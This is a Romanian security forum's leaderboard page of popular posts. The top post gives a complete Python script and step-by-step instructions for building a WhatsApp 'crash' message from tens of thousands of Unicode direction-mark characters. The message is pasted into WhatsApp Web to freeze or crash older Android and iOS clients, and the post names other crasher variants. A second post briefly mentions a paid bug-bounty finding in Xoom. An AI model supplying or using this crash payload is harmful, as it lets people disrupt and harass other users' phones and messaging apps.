Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 06/17/21 in all areas

  1. Poate sunt persoane care utilizeaza versiuni mai vechi si dau click de mai multe ori pe elemente ce induc bufferoverflow in memorie ca in exemplul de mai jos. Exista totusi si versiuni noi care trec de protectia 'unicode' a whatsapp-ului ele se numesc: -"Binario", "Contact bombs", "Trava Zap", "Crashers" , "message/vcard crash" O versiune python care merge pe androidurile si ios mai vechi : mai intai instalati cu pip pyperclip pip install pyperclip dupa care scrieti codul in notepad: import pyperclip ltr = u'\u200E' rtl = u'\u200F' ltr_rtl = ltr + rtl bombmess = (ltr_rtl * 20000) #print(bombmess) #not recommended on crazy = u'\u2067' pyperclip.copy(crazy + bombmess) spam = pyperclip.paste() dupa care salvati in fisier cu extensia .py si rulati in cmd/terminal fisier.py simplu. textul de trimis pe whatsapp web se copie automat pe clipboard si trebuie doar sa dai paste in whatsapp... Cum functioneaza? Foloseste ~120k combinatii de caractere unicode compresate intr-un singur cod ca sa treaca de limita de caractere a protectiei whatsapp Fiecare se poate juca si gasi combinatii noi folosind prima coloana de aici pyperclip este doar pentru copy paste 200E si 200F sunt pentru left to right mark si right to left mark. 2067 este caracterul de compresie, fara acest caracter este posibil ca elemntele sa nu fie incarcate in memorie deorece este posibil ca whatsapp sa creada ca a primit un mesaj gol. Se pot adauga elemente care sa determine utilizatorul sa execute click de mai multe ori etc...
    4 points
  2. O vulnerabilitate pe care am descoperit-o in https://www.xoom.com/. Aplicatia este detinuta de cei de la PayPal. Este o problema mai veche. Recompensa: 5,300$
    2 points
  3. Frumos, vad ca aparent se foloseste sa trimiti bani, puteau da ceva mai bine.
    1 point
×
×
  • Create New...